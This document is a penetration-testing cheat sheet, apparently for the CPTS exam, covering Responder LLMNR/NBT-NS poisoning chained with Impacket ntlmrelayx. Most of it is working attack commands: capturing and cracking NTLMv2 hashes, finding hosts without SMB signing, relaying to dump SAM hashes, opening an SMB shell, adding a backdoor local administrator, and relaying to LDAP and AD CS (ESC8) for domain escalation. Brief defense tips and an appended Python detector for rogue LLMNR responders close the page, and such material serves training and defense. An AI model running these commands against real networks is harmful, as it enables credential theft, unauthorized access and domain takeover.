
Responder + NTLMRelayx Chain

LLMNR/NBT-NS poisoning to credential capture and relay: targeting machines with SMB signing disabled to achieve code execution or domain escalation.

How Poisoning Works

When a Windows machine tries to resolve a hostname that doesn't exist in DNS, it broadcasts LLMNR (Link-Local Multicast Name Resolution) and NBT-NS queries. Responder answers these with your IP, forcing the victim to authenticate to you with their NTLM credentials.

Credential Capture (Hash Only)

# Start Responder to capture NTLMv2 hashes
sudo responder -I eth0 -wfv
# -w = WPAD proxy server, -f = fingerprinting, -v = verbose

# Wait for authentication attempts; hashes are saved to:
# /usr/share/responder/logs/SMB-NTLMv2-*.txt

# Crack with hashcat
hashcat -m 5600 ntlmv2.txt /usr/share/wordlists/rockyou.txt

# Example hash format:
# Administrator::CORP:aabbccddeeff0011:ABC123...:0101000...

NTLM Relay Attack

Instead of cracking, relay the hash directly to another machine. Requires: SMB signing disabled on the target (not the DC; DCs require SMB signing by default).

# Step 1: Disable SMB in Responder (we relay, not capture)
sudo nano /etc/responder/Responder.conf
# Set: SMB = Off, HTTP = Off

# Step 2: Find relay targets (machines without SMB signing)
nxc smb 10.10.10.0/24 --gen-relay-list targets.txt

# Step 3: Start ntlmrelayx targeting those machines
impacket-ntlmrelayx -tf targets.txt -smb2support

# Step 4: Start Responder
sudo responder -I eth0 -wfv

# When a victim authenticates -> ntlmrelayx relays to targets.txt
# Default action: dumps SAM database of target if admin relay successful

Relay Target Discovery

# Find targets without SMB signing (relay candidates)
nxc smb 10.10.10.0/24 --gen-relay-list unsigned.txt
nmap --script smb-security-mode -p 445 10.10.10.0/24 | grep -E "message_signing|disabled"

Domain Escalation via Relay

# Option 1: Get NTLM hashes from SAM (local accounts)
impacket-ntlmrelayx -tf targets.txt -smb2support
# Output: hashes for local admin accounts

# Option 2: Interactive SMB shell on relay target
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Spawns interactive SMB shell on 127.0.0.1:11000
nc 127.0.0.1 11000

# Option 3: Execute command on relay target
impacket-ntlmrelayx -tf targets.txt -smb2support -c "net user hacker Pass123! /add && net localgroup administrators hacker /add"

# Option 4: Relay to LDAP for shadow credentials / RBCD
impacket-ntlmrelayx -t ldap://DC_IP -smb2support --shadow-credentials --shadow-target 'TARGET$'

# Option 5: Relay to AD CS (ESC8)
impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Important: You cannot relay a hash back to the machine it came from (same-host relay). You need at least 2 machines: the victim authenticates to you, and you relay to a different machine.

Defense & Exam Tips

  • Enable SMB signing on all machines to block relay (DCs do this by default)
  • Disable LLMNR via GPO: Computer Config → Admin Templates → Network → DNS Client → Turn off multicast name resolution
  • For CPTS exam: this attack works best in the initial foothold phase on internal networks
  • Combine with PetitPotam or PrinterBug to force DC authentication rather than waiting for organic traffic
  • Check if Responder is already running before starting: ps aux | grep responder
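A defensive counterpart to the poisoning mechanism described under "How Poisoning Works" and to the defense tips above, added here as an example (not code from Responder, Impacket or the original page): a poisoner detector that sends an LLMNR query (RFC 4795 wire format, same as a DNS message) for a random name nobody owns to the 224.0.0.252:5355 multicast group. A legitimate network never answers such a query, so any A-record reply is a poisoner on the segment. It assumes a host with an IPv4 multicast-capable interface; the probe name prefix and timeout are arbitrary choices.

```python
import os
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 LLMNR multicast group (RFC 4795)
LLMNR_PORT = 5355


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Build an LLMNR A query: 12-byte DNS-style header + one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0, QDCOUNT=1
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)        # QTYPE=A, QCLASS=IN


def _skip_name(data: bytes, off: int) -> int:
    """Advance past a (possibly compressed) name and return the new offset."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:   # compression pointer: two bytes, ends name
            return off + 2
        off += length + 1


def parse_llmnr_response(data: bytes, txid: int) -> list:
    """Return IPv4 strings from A answers whose transaction ID matches, else []."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000 or an == 0:  # QR bit must be set
        return []
    off = 12
    for _ in range(qd):                                # skip question section
        off = _skip_name(data, off) + 4                 # + QTYPE + QCLASS
    ips = []
    for _ in range(an):
        off = _skip_name(data, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return ips


def probe(timeout: float = 2.0) -> list:
    """Query a random non-existent name; any reply is a poisoner (src, claimed IP)."""
    name = "chk-" + os.urandom(4).hex()                # constructed, never registered
    txid = int.from_bytes(os.urandom(2), "big")
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    s.settimeout(timeout)
    s.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = s.recvfrom(512)
            hits.extend((src, ip) for ip in parse_llmnr_response(data, txid))
    except socket.timeout:
        pass
    return hits
```

Run `probe()` periodically from a monitoring host on each broadcast domain; a non-empty result names the responding host, which is what an alert on rogue LLMNR responders should carry.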